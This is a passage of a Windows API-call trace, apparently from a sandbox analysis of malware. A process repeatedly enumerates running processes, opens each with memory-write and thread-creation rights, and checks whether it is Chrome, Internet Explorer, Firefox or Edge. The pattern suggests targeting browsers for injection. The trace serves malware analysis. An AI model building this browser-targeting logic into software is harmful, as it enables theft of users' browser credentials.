	[0242.526] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.526] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x89c4
	[0242.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.527] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.527] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.528] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.528] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0242.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x89c8
	[0242.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.529] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0242.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.529] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.530] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0242.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.530] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0242.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x89cc
	[0242.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.531] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.531] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.532] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.532] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0242.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x89d0
	[0242.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.533] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0242.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.533] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.533] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0242.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.534] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x89d4
	[0242.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.535] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.535] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.536] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.536] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0242.537] CloseHandle (hObject=0x4fd0) returned 1
	[0242.537] Sleep (dwMilliseconds=0x64) 
	[0242.644] GetCurrentProcessId () returned 0x110
	[0242.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0242.647] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0242.648] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0242.650] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0242.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x89d8
	[0242.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.651] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.652] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.652] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.652] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.653] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x89dc
	[0242.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.654] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.655] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.655] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.655] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.656] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0242.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x89e0
	[0242.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.657] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0242.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.657] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.658] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0242.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.659] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x89e4
	[0242.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.660] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.661] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.661] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.662] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.662] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0242.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x89e8
	[0242.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.663] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0242.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.663] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.663] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0242.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.664] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.664] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0242.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x89ec
	[0242.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.665] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0242.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.665] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.666] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0242.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.666] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0242.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x89f0
	[0242.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.667] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0242.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.667] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.668] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0242.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.668] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.668] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0242.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x89f4
	[0242.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.669] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0242.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.669] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.669] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0242.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.670] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.670] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x89f8
	[0242.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.671] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.671] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.672] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.672] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x89fc
	[0242.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.674] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.674] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.675] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.675] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8a00
	[0242.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.676] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.676] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.677] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.677] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8a04
	[0242.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.678] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.678] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.679] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.679] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.679] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8a08
	[0242.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.680] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.681] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.681] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.681] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8a0c
	[0242.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.682] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.683] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.683] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.683] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8a10
	[0242.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.684] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.685] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.685] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.685] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.686] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0242.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8a14
	[0242.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.687] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0242.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.687] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.687] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0242.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.688] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.688] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8a18
	[0242.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.689] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.689] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.689] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.690] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0242.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8a1c
	[0242.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.691] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.691] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.692] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.692] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8a20
	[0242.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.693] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0242.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.693] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
